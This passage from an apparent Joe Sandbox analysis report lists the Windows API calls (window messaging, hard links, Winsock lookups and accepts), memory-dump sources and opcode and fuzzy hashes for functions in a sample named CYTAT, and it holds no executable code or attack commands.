                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Variant$AllocClearCopyInitString
                                                • String ID:
                                                • API String ID: 2808897238-0
                                                • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                APIs
                                                • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                • __itow.LIBCMT ref: 004699CD
                                                  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                • __itow.LIBCMT ref: 00469A97
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$__itow
                                                • String ID:
                                                • API String ID: 3379773720-0
                                                • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                • ScreenToClient.USER32(?,?), ref: 00449A80
                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$ClientMoveRectScreen
                                                • String ID:
                                                • API String ID: 3880355969-0
                                                • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                • String ID:
                                                • API String ID: 2782032738-0
                                                • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                APIs
                                                • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                • GetWindowRect.USER32(?,?), ref: 00441722
                                                • PtInRect.USER32(?,?,?), ref: 00441734
                                                • MessageBeep.USER32(00000000), ref: 004417AD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                • String ID:
                                                • API String ID: 1352109105-0
                                                • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                APIs
                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                • String ID:
                                                • API String ID: 3321077145-0
                                                • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                • __isleadbyte_l.LIBCMT ref: 004208A6
                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                APIs
                                                • GetParent.USER32(?), ref: 004503C8
                                                • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Proc$Parent
                                                • String ID:
                                                • API String ID: 2351499541-0
                                                • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                • TranslateMessage.USER32(?), ref: 00442B01
                                                • DispatchMessageW.USER32(?), ref: 00442B0B
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Message$Peek$DispatchTranslate
                                                • String ID:
                                                • API String ID: 1795658109-0
                                                • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                APIs
                                                • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                • GetCaretPos.USER32(?), ref: 004743B2
                                                • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                • GetForegroundWindow.USER32 ref: 004743EE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                • String ID:
                                                • API String ID: 2759813231-0
                                                • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                APIs
                                                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                • _wcslen.LIBCMT ref: 00449519
                                                • _wcslen.LIBCMT ref: 00449526
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend_wcslen$_wcspbrk
                                                • String ID:
                                                • API String ID: 2886238975-0
                                                • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __setmode$DebugOutputString_fprintf
                                                • String ID:
                                                • API String ID: 1792727568-0
                                                • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                APIs
                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$Long$AttributesLayered
                                                • String ID:
                                                • API String ID: 2169480361-0
                                                • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                APIs
                                                  • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                  • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                  • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                • String ID: cdecl
                                                • API String ID: 3850814276-3896280584
                                                • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                APIs
                                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                • _memmove.LIBCMT ref: 0046D475
                                                • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                • String ID:
                                                • API String ID: 2502553879-0
                                                • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                APIs
                                                • SendMessageW.USER32 ref: 00448C69
                                                • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow
                                                • String ID:
                                                • API String ID: 312131281-0
                                                • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                APIs
                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
